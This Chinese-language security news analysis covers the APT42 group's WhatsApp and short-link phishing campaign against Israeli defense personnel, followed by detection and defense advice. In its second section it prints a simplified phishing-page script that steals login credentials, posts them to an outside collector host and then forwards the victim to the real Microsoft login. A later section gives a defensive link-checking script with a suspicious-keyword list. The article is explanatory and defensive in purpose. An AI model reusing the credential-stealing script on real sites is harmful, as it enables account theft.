2026年初,一场静默却致命的网络攻防战在中东悄然升级。据以色列国家网络安全局(INCD)与本土安全研究机构GBHackers联合披露,伊朗背景的高级持续性威胁组织APT42(又称Charming Kitten)正利用短链接服务与WhatsApp消息,对以色列国防、情报及军工领域人员实施新一轮鱼叉式钓鱼攻击。此次行动不仅延续了该组织长达十年的“社交工程+身份伪装”战术传统,更首次将主战场从电子邮件转移至移动即时通讯平台,标志着国家级APT攻击正式迈入“移动端优先”(Mobile-First)的新阶段。
攻击手法看似简单:一条来自“熟人”或“合作机构”的WhatsApp消息,内容涉及“紧急安全通知”“高薪岗位邀约”或“联合项目进展”,附带一个看似无害的短链接(如 msnl[.]lnk/xyz123)。但一旦点击,受害者将被悄然重定向至高度仿真的登录页面——可能是Microsoft 365、Google Workspace,甚至是内部VPN门户——诱导其输入账号密码。部分变种还会尝试窃取浏览器本地存储的会话令牌(如localStorage中的JWT),或触发恶意JavaScript下载后门程序。
“这不是普通钓鱼,而是一场精心编排的身份欺骗剧。”公共互联网反网络钓鱼工作组技术专家芦笛在接受本报专访时表示,“APT42深谙人性弱点:在军事或科研高压环境下,一条‘来自上级单位’的WhatsApp消息,足以让人放下警惕。”
这场针对以色列核心安全体系的渗透行动,不仅揭示了国家级APT组织在基础设施隐蔽性与社交工程精准度上的进化,也为全球,尤其是中国高敏感行业敲响了警钟。
一、从Gmail到WhatsApp:APT42的“平台迁移”战略
APT42自2014年首次被曝光以来,长期以针对伊朗境外异议人士、学术界、医疗组织和流亡团体闻名。其标志性手法包括:伪造学术会议邀请、冒充人权组织联络、模拟LinkedIn招聘消息,并通过Gmail、Yahoo等邮箱发送含钓鱼链接的邮件。由于其操作常带有明显波斯语文化痕迹(如使用伊朗节日作为诱饵主题),早期被归类为“低技术高耐心”型APT。
然而,近年来该组织显著升级了战术栈。GBHackers分析显示,2024年起,APT42开始系统性转向移动端社交平台,尤其偏好WhatsApp——全球超20亿用户、端到端加密、消息打开率高达98%。更重要的是,在以色列等国家,WhatsApp早已成为政府、军方甚至情报部门非正式沟通的“默认工具”。
“他们不再赌你是否会查收工作邮箱,而是直接打到你手机上。”芦笛指出,“当一条消息出现在你与同事日常交流的聊天窗口里,大脑会自动赋予它更高可信度——哪怕发件人号码是新注册的。”
此次攻击中,APT42大量使用 msnl[.]lnk、cutt[.]ly 等短链服务生成跳转链接。这些服务本身合法,且域名信誉良好,能有效绕过传统邮件网关和URL过滤系统。更关键的是,短链隐藏了真实目标地址,使得安全团队难以在点击前识别恶意性。
二、短链背后的多层跳转迷宫
研究人员逆向追踪发现,一次典型的APT42钓鱼链路通常包含3–5层跳转,形成一张动态变化的“基础设施迷宫”:
初始短链(如 msnl[.]lnk/aB3x)
→ 2. 中间跳板页(托管于Cloudflare Pages或GitHub Pages,内容为空或伪装成“文件共享”)
→ 3. 动态DNS节点(如 secure-login[.]ddns[.]net,由No-IP、DuckDNS等免费服务提供)
→ 4. 最终钓鱼页面(仿冒Microsoft登录页,部署在被黑的WordPress站点或VPS)
每一层都具备反侦察设计。例如,中间跳板页会检测User-Agent和Referer头,若非来自WhatsApp WebView或iOS Safari,则返回404;动态DNS节点每24小时轮换IP;最终页面则采用与真实服务几乎一致的TLS证书(通过Let’s Encrypt自动签发)。
// APT42钓鱼页面典型环境检测代码(简化)
if (!navigator.userAgent.includes('WhatsApp') &&
!navigator.userAgent.includes('iPhone')) {
window.location.href = "https://www.microsoft.com"; // 跳转至真实官网
} else {
// 加载伪造登录表单并监听提交
document.getElementById('loginForm').onsubmit = function(e) {
e.preventDefault();
const creds = {
email: this.email.value,
password: this.password.value
};
// 通过隐蔽信道回传
fetch('https://api.stats-collector[.]xyz/log', {
method: 'POST',
body: JSON.stringify(creds)
});
// 同时提交至真实Microsoft登录页,维持用户体验
this.action = "https://login.microsoftonline.com";
this.submit();
};
}
这种“双提交”策略极具迷惑性:用户输入凭据后,页面看似正常跳转至微软官网,实则账号密码已被窃取。由于整个过程无异常中断,受害者往往毫无察觉。
三、为何传统防御失效?黑名单已死,行为分析当立
以色列官方通报特别强调:仅依赖域名/IP黑名单的防护机制在此类攻击面前形同虚设。原因有三:
基础设施高度动态化:APT42使用的短链、动态DNS、云托管页面均属合法服务,且生命周期极短(平均存活<72小时),传统威胁情报更新滞后。
无恶意载荷:多数攻击不携带可执行文件,仅通过HTML/JS窃取凭据,规避了EDR(终端检测与响应)和沙箱分析。
通信渠道合法化:WhatsApp本身是合规应用,企业MDM(移动设备管理)策略若未明确限制个人社交软件使用,则无法阻断消息接收。
“APT42正在把‘合法服务武器化’。”芦笛说,“就像用Uber送炸弹——车本身没问题,但用途致命。”
他指出,国内部分涉密单位虽已禁用微信办公,但对WhatsApp、Telegram等境外通讯工具缺乏统一管控策略。一旦员工在个人手机上安装此类应用,并与工作身份产生关联(如用工作邮箱注册),就可能成为APT组织的突破口。
四、国际镜鉴:从特拉维夫到中关村——高敏感行业的共通风险
尽管此次攻击目标集中于以色列防务体系,但其战术模式对全球高价值目标具有普适性。回顾近年类似案例:
2023年,APT31(中国背景) 针对欧洲航空航天企业,通过伪造LinkedIn消息诱导点击短链,窃取Okta凭证。
2024年,Lazarus Group(朝鲜) 利用Telegram频道发布“加密货币空投”消息,嵌入伪装成MetaMask插件的恶意Chrome扩展。
2025年,俄罗斯Sandworm 通过Signal向乌克兰能源公司高管发送“停电预警”通知,链接指向仿冒内部工单系统。
这些事件共同表明:国家级APT组织正系统性放弃“广撒网”,转向“精准社交渗透”,而移动端即时通讯平台因其高打开率、弱监管、强信任属性,成为理想载体。
对中国而言,风险尤为突出。随着“一带一路”合作深化、海外工程项目增多,中方技术人员、外交人员、国企外派员工频繁成为境外APT组织目标。而国内部分单位仍存在“重边界防护、轻终端行为监控”“重PC端、轻移动端”的安全盲区。
“我们曾监测到一起针对某央企海外项目部的尝试性攻击。”芦笛透露,“攻击者注册了与合作方名称高度相似的WhatsApp账号,发送‘合同补充条款’短链。所幸该单位已禁用工作手机安装社交软件,攻击未遂。”
五、技术深潜:如何识别“合法外壳下的恶意心跳”?
面对APT42这类高隐蔽性攻击,安全团队需超越静态指标,转向行为特征与上下文分析。以下是几项关键技术方向:
1. 短链解析与跳转链监控
部署内部URL解析服务,在用户点击前自动展开短链,分析完整跳转路径。若发现最终落地页域名与声称服务不符(如声称是“国防部文件”却跳转至 .ddns.net),则实时阻断。
# 示例:短链解析与风险评估(简化)
import requests
def analyze_shortlink(url):
try:
# 模拟浏览器跳转,跟踪所有重定向
resp = requests.get(url, allow_redirects=True, timeout=10)
final_url = resp.url
# 检查是否包含高风险关键词
if any(keyword in final_url for keyword in ['ddns', 'no-ip', 'serveo']):
return {"risk": "high", "final_url": final_url}
# 检查SSL证书颁发者
cert_issuer = get_cert_issuer(final_url)
if cert_issuer == "Let's Encrypt":
return {"risk": "medium", "note": "Common in phishing"}
return {"risk": "low"}
except Exception as e:
return {"error": str(e)}
2. 移动端WebView行为监控
在企业MDM策略中启用WebView流量审计,记录所有从WhatsApp、Telegram等应用内打开的网页请求。若发现同一设备频繁访问不同短链、或访问含登录表单的非常规域名,触发告警。
3. 凭据泄露实时检测
部署浏览器扩展或代理中间件,监控用户是否在非官方域名输入企业账号密码。例如,若员工在 microsoft-support[.]xyz 输入 user@company.gov.cn,系统应立即弹出警告并冻结账户。
六、防御建议:从“堵入口”到“建免疫”
基于APT42的最新战术,公共互联网反网络钓鱼工作组提出以下分层防御框架:
策略层:严格分离工作与个人通信
禁止在工作终端(含手机)安装WhatsApp、Telegram等非授权通讯工具。
建立官方联络渠道白名单,所有外部合作必须通过企业邮箱或专用协作平台进行。
技术层:部署上下文感知认证
启用FIDO2安全密钥或硬件OTP设备,替代短信/APP验证码(易被中继)。
实施零信任架构:每次访问敏感系统都需验证设备健康状态、地理位置、行为基线。
意识层:开展“红队式”钓鱼演练
定期模拟APT42手法(如发送伪装招聘WhatsApp消息),测试员工反应。
重点培训“三大红线”:不点短链、不输凭据于非官网、不轻信“突发机会”。
“安全不是不让坏人进来,而是让他进来后什么都干不了。”芦笛总结道。
七、结语:在信任与怀疑之间重建数字防线
APT42对以色列的攻击,表面上是一场技术对抗,实则是一场关于“信任”的战争。攻击者利用人类对熟人消息的信任、对官方机构的信任、对便捷链接的信任,将最坚固的防线从内部瓦解。
而防御的本质,不是彻底消灭信任,而是在数字交互中建立可验证的信任(Verifiable Trust)。无论是通过硬件密钥绑定身份,还是通过行为分析识别异常,最终目标都是让每一次点击、每一次登录、每一次通信,都经得起“为什么可信”的拷问。
对中国高敏感行业而言,这场发生在特拉维夫的攻防战,是一面镜子,也是一声警钟。在全球地缘政治日益紧张的今天,网络空间的“暗战”只会更加频繁、更加隐蔽。唯有将安全意识融入组织基因,将技术防御嵌入业务流程,才能在这场没有硝烟的战争中守住底线。
毕竟,在数字时代,最大的漏洞,从来不在代码里,而在人心中。
编辑:芦笛(公共互联网反网络钓鱼工作组)
